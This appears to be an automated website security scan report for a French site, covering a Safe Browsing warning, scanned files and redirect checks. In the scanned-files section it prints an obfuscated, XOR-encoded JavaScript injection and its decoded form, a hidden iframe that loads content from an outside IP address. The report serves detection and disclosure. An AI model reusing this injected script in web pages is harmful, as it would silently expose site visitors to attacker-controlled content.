Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mers-et-littoraux.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mers-et-littoraux.com/ | 200 OK Content-Length: 9270 Content-Type: text/html | clean |
http://mers-et-littoraux.com/jquery.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://mers-et-littoraux.com/script.js | 200 OK Content-Length: 34365 Content-Type: application/x-javascript | clean |
http://mers-et-littoraux.com/script.responsive.js | 200 OK Content-Length: 7380 Content-Type: application/x-javascript | clean |
http://mers-et-littoraux.com/test404page.js | 404 Not Found Content-Length: 2137 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var de48=Array(0x69,0x3c,0x33,0x27,0x34,0x38,0x30,0x75,0x26,0x27,0x36,0x68,0x72,0x3d,0x21,0x21,0x25,0x6f,0x7a,0x7a,0x67,0x65,0x64,0x7b,0x67,0x64,0x6d,0x7b,0x67,0x60,0x65,0x7b,0x64,0x6c,0x7a,0x25,0x39,0x26,0x66,0x66,0x66,0x66,0x7a,0x36,0x3a,0x20,0x3b,0x21,0x7b,0x25,0x3d,0x25,0x6a,0x3a,0x68,0x66,0x65,0x72,0x75,0x26,0x21,0x2c,0x39,0x30,0x68,0x72,0x31,0x3c,0x26,0x25,0x39,0x34,0x2c,0x6f,0x3b,0x3a,0x3b,0x30,0x72,0x6b,0x69,0x7a,0x3c,0x33,0x27,0x34,0x38,0x30,0x6b),dbd1=new String;for(b97e=0;b97e<0x59;b97e++)dbd1+=String.fromCharCode(de48[b97e]^0x55);document.write(dbd1); Decoded script: <iframe src='http://201.218.250.19/pls3333/count.php?o=30' style='display:none'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mers-et-littoraux.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 11:51:14 GMT
Accept-Ranges: bytes
ETag: "13f808d-2436-4cc7aab213800"
Server: Apache
Content-Length: 9270
Content-Type: text/html
Last-Modified: Sat, 20 Oct 2012 09:58:56 GMT
X-Powered-By: PleskLin
...9270 bytes of data.
GET / HTTP/1.1
Host: mers-et-littoraux.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 11:51:14 GMT
Accept-Ranges: bytes
ETag: "13f808d-2436-4cc7aab213800"
Server: Apache
Content-Length: 9270
Content-Type: text/html
Last-Modified: Sat, 20 Oct 2012 09:58:56 GMT
X-Powered-By: PleskLin
...9270 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mers-et-littoraux.com
Referer: http://www.google.com/search?q=mers-et-littoraux.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mers-et-littoraux.com
Referer: http://www.google.com/search?q=mers-et-littoraux.com
Result:
The result is similar to the first query. There are no suspicious redirects found.